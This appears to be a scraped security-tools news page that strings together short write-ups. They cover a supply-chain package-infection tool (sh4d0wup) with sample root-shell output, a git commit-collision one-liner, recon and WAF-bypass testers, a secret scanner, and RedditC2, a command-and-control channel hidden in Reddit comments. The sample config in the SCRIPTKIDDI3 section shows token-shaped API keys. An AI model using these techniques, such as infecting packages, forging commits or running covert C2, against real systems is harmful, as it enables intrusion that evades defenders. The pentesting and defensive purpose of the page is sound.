Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: de laying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

Bruteforce git commit partial collisions

Here's a short oneliner on how to take the latest commit from a git repository, send it to a remote computer that has sh4d0wup installed to tweak it until the commit id starts with the provided --collision-prefix and then inserts the new commit back into the repository on your local computer:

% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time, eventually it shows a commit id that you can use to create a new branch:

git show 777754fde8...
git branch some-name 777754fde8...


auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration


CIS Benchmark testing of Windows SIEM configuration

This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:

  • The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019.
  • The script connects with SSH. SSH is included with Windows Server 2019, it just has to be enabled. If you would like to see WinRM (or other) connection types, let me know or send a PR.
  • Some tests are included here which were not included in the CIS guide. The recommended settings for these Subcategories are based on the logging volume for these events, versus the security value. In nearly all cases, the recommendation is to turn off auditing for these settings.
  • The YAML file cis-benchmarks.yaml is the YAML representation of the CIS Benchmark guideline for each Subcategory.
  • The command run under SSH is auditpol /get /category:*


Further details on usage and other background info is at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/



Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

[Thanks ChatGPT for the Description]


How it Works ?

This tool mainly performs 3 tasks

  1. Effective Subdomain Enumeration from Various Tools
  2. Get URLs with open HTTP and HTTPS service.
  3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

Install SCRIPTKIDDI3

SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh

Usage

scriptkiddi3 -h

This will display help for the tool. Here are all the switches it supports.

Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.


[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
Vulnerability Detection with Nuclei,
an d Scan for SUBDOMAINE TAKEOVER

[FLAGS:]
[TARGET:] -d, --domain target domain to scan

[CONFIG:] -c, --config path of your configuration file for subfinder

[HELP:] -h, --help to get help menu

[UPDATE:] -u, --update to update tool

[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com


Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com


Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com

MODES

1. FULL EXPLOITATION MODE

Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

  scriptkiddi3 -m EXP -d target.com

FULL EXPLOITATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • Effective URL Enumeration ( HTTP and HTTPs service )
  • Run Vulnerability Detection with Nuclei
  • Subdomain Takeover Test on previous results

2. SUBDOMAIN ENUMERATION MODE

Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

  scriptkiddi3 -m SUB -d target.com

SUBDOMAIN ENUMERATION MODE contains following functions

  • Effective Subdomain Enumeration with different services and open source tools
  • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

3. URL ENUMERATION MODE

Run scriptkiddi3 in URL ENUMERATION MODE

  scriptkiddi3 -m URL -d target.com

URL ENUMERATION MODE contains following functions

  • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

Using your own CONFIG File for subfinder

  scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

Updating tool to latest version You can run following command to update tool

  scriptkiddi3 -u

An Example of config.yaml

binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password

For Developers

If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

If you have any other queries, you can always contact me on Twitter(thecyberneh)

Credits

I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



RedditC2 - Abusing Reddit API To Host The C2 Traffic, Since Most Of The Blue-Team Members Use Reddit, It Might Be A Great Way To Make The Traffic Look Legit


Abusing Reddit API to host the C2 traffic, since most of the blue-team members use Reddit, it might be a great way to make the traffic look legit.


[Disclaimer]: Use of this project is for Educational/ Testing purposes only. Using it on unauthorised machines is strictly forbidden. If somebody is found to use it for illegal/ malicious intent, author of the repo will not be held responsible.

Β 

Requirements

Install PRAW library in python3:

pip3 install praw

Quickstart

See the Quickstart guide on how to get going right away!

Demo

Workflow

Teamserver

  1. Go to the specific Reddit Post & post a new comment with the command ("in: ")
  2. Read for new comment which includes the word "out:"
  3. If no such comment is found, go back to step 2
  4. Parse the comment, decrypt it and read it's output
  5. Edit the existing comment to "executed", to avoid reexecuting it

Client

  1. Go to the specific Reddit Post & read the latest comment which includes "in:"
  2. If no new comment is detected, go back to step 1
  3. Parse the command out of the comment, decrypt it and execute it locally
  4. Encrypt the command's output and reply it to the respective comment ("out:" )

Below is a demonstration of the XOR-encrypted C2 traffic for understanding purposes:

Scanning results

Since it is a custom C2 Implant, it doesn't get detected by any AV as the bevahiour is completely legit.

TO-DO

  • Teamserver and agent compatible in Windows/Linux
  • Make the traffic encrypted
  • Add upload/download feature
  • Add persistence feature
  • Generate the agents dynamically (from the TeamServer)
  • Tab autocompletion

Credits

Special thanks to @T4TCH3R for working with me and contributing to this project.



Noseyparker - A Command-Line Program That Finds Secrets And Sensitive Information In Textual Data And Git History


Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.

Key features:

  • It supports scanning files, directories, and the entire history of Git repositories
  • It uses regular expression matching with a set of 95 patterns chosen for high signal-to-noise based on experience and feedback from offensive security engagements
  • It groups matches together that share the same secret, further emphasizing signal over noise
  • It is fast: it can scan at hundreds of megabytes per second on a single core, and is able to scan 100GB of Linux kernel source history in less than 2 minutes on an older MacBook Pro

This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.


Building from source

1. (On x86_64) Install the Hyperscan library and headers for your system

On macOS using Homebrew:

brew install hyperscan pkg-config

On Ubuntu 22.04:

apt install libhyperscan-dev pkg-config

1. (On non-x86_64) Build Vectorscan from source

You will need several dependencies, including cmake, boost, ragel, and pkg-config.

Download and extract the source for the 5.4.8 release of Vectorscan:

wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz

Build with cmake:

cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build

Set the HYPERSCAN_ROOT environment variable so that Nosey Parker builds against your from-source build of Vectorscan:

export HYPERSCAN_ROOT="$PWD/build"

Note: The Nosey Parker Dockerfile builds Vectorscan from source and links against that.

2. Install the Rust toolchain

Recommended approach: install from https://rustup.rs

3. Build using Cargo

cargo build --release

This will produce a binary at target/release/noseyparker.

Docker Usage

A prebuilt Docker image is available for the latest release for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:latest

A prebuilt Docker image is available for the most recent commit for x86_64:

docker pull ghcr.io/praetorian-inc/noseyparker:edge

For other architectures (e.g., ARM) you will need to build the Docker image yourself:

docker build -t noseyparker .

Run the Docker image with a mounted volume:

docker run -v "$PWD":/opt/ noseyparker

Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.

Usage quick start

The datastore

Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan command if needed. You can also create a datastore explicitly using the datastore init -d PATH command.

Scanning filesystem content for secrets

Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.

For example, if you have a Git clone of CPython locally at cpython.git, you can scan its entire history with the scan command. Nosey Parker will create a new datastore at np.cpython and saves its findings there.

$ noseyparker scan --datastore np.cpython cpython.git
Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ 100% 28.30 GiB/28.30 GiB [00:00:53]
Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,1 92
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Run the `report` command next to show finding details.

Scanning Git repos by URL, GitHub username, or GitHub organization name

Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL, --github-user NAME, and --github-org NAME options to scan allow you to specify repositories of interest.

For example, to scan the Nosey Parker repo itself:

$ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker

For example, to scan accessible repositories belonging to octocat:

$ noseyparker scan --datastore np.noseyparker --github-user octocat

These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

See noseyparker help scan for more details.

Summarizing findings

Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:

$ noseyparker summarize --datastore np.cpython

Rule Distinct Groups Total Matches
───────────────────────────────────────────────────────────
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Reporting detailed findings

To see details of Nosey Parker's findings, use the report command. This prints out a text-based report designed for human consumption:

(Note: the findings above are synthetic, invalid secrets.) Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

Enumerating repositories from GitHub

To list URLs for repositories belonging to GitHub users or organizations, use the github repos list command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:

$ noseyparker github repos list --user octocat
https://github.com/octocat/Hello-World.git
https://github.com/octocat/Spoon-Knife.git
https://github.com/octocat/boysenberry-repo-1.git
https://github.com/octocat/git-consortium.git
https://github.com/octocat/hello-worId.git
https://github.com/octocat/linguist.git
https://github.com/octocat/octocat.github.io.git
https://github.com/octocat/test-repo1.git

An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.

Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT option.

See noseyparker help github for more details.

Getting help

Running the noseyparker binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h.

Tip: More detailed help is available with the help command or long-form --help option.

Contributing

Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.

If you are considering making significant code changes, please open an issue first to start discussion.

License

Nosey Parker is licensed under the Apache License, Version 2.0.

Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.



Waf-Bypass - Check Your WAF Before An Attacker Does


WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.


How to run

It is forbidden to use for illegal and illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.

Run from Docker

The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:

# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'

Run source code from GitHub

# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'

Options

  • '--proxy' (--proxy='http://proxy.example.com:3128') - option allows to specify where to connect to instead of the host.

  • '--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.

  • '--user-agent' (--user-agent 'MyUserAgent 1/1') - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").

  • '--block-code' (--block-code='403' --block-code='222') - option allows you to specify the HTTP status code to expect when the WAF is blocked. (default is 403). Multiple use is allowed.

  • '--threads' (--threads=15) - option allows to specify the number of parallel scan threads (default is 10).

  • '--timeout' (--timeout=10) - option allows to specify a request processing timeout in sec. (default is 30).

  • '--json-format' - an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).

  • '--details' - display the False Positive and False Negative payloads. Not available in JSON format.

  • '--exclude-dir' - exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'). Multiple use is allowed.

Payloads

Depending on the purpose, payloads are located in the appropriate folders:

  • FP - False Positive payloads
  • API - API testing payloads
  • CM - Custom HTTP Method payloads
  • GraphQL - GraphQL testing payloads
  • LDAP - LDAP Injection etc. payloads
  • LFI - Local File Include payloads
  • MFD - multipart/form-data payloads
  • NoSQLi - NoSQL injection payloads
  • OR - Open Redirect payloads
  • RCE - Remote Code Execution payloads
  • RFI - Remote File Inclusion payloads
  • SQLi - SQL injection payloads
  • SSI - Server-Side Includes payloads
  • SSRF - Server-side request forgery payloads
  • SSTI - Server-Side Template Injection payloads
  • UWA - Unwanted Access payloads
  • XSS - Cross-Site Scripting payloads

Write your own payloads

When compiling a payload, the following zones, method and options are used:

  • URL - request's path
  • ARGS - request's query
  • BODY - request's body
  • COOKIE - request's cookie
  • USER-AGENT - request's user-agent
  • REFERER - request's referer
  • HEADER - request's header
  • METHOD - request's method
  • BOUNDARY - specifies the contents of the request's boundary. Applicable only to payloads in the MFD directory.
  • ENCODE - specifies the type of payload encoding (Base64, HTML-ENTITY, UTF-16) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16). Applicable only to for ARGS, BODY, COOKIE and HEADER zone. Not applicable to payloads in API and MFD directories. Not compatible with option JSON.
  • JSON - specifies that the request's body should be in JSON format
  • BLOCKED - specifies that the request should be blocked (FN testing) or not (FP)

Except for some cases described below, the zones are independent of each other and are tested separately (those if 2 zones are specified - the script will send 2 requests - alternately checking one and the second zone).

For the zones you can use %RND% suffix, which allows you to generate an arbitrary string of 6 letters and numbers. (e.g.: param%RND=my_payload or param=%RND% OR A%RND%B)

You can create your own payloads, to do this, create your own folder on the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). Allowed data format is JSON.

API directory

API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'.

MFD directory

For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...').

If a BOUNDARY is specified, then the content of the BODY must be formatted in accordance with the RFC, but this allows for multiple payloads in BODY a separated by BOUNDARY.

Other zones are allowed in this directory (e.g.: URL, ARGS etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.



Kali Linux 2023.1 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2023.1. This release has various impressive updates.

he changelog summary since the 2022.4 release from December:


More info here.


❌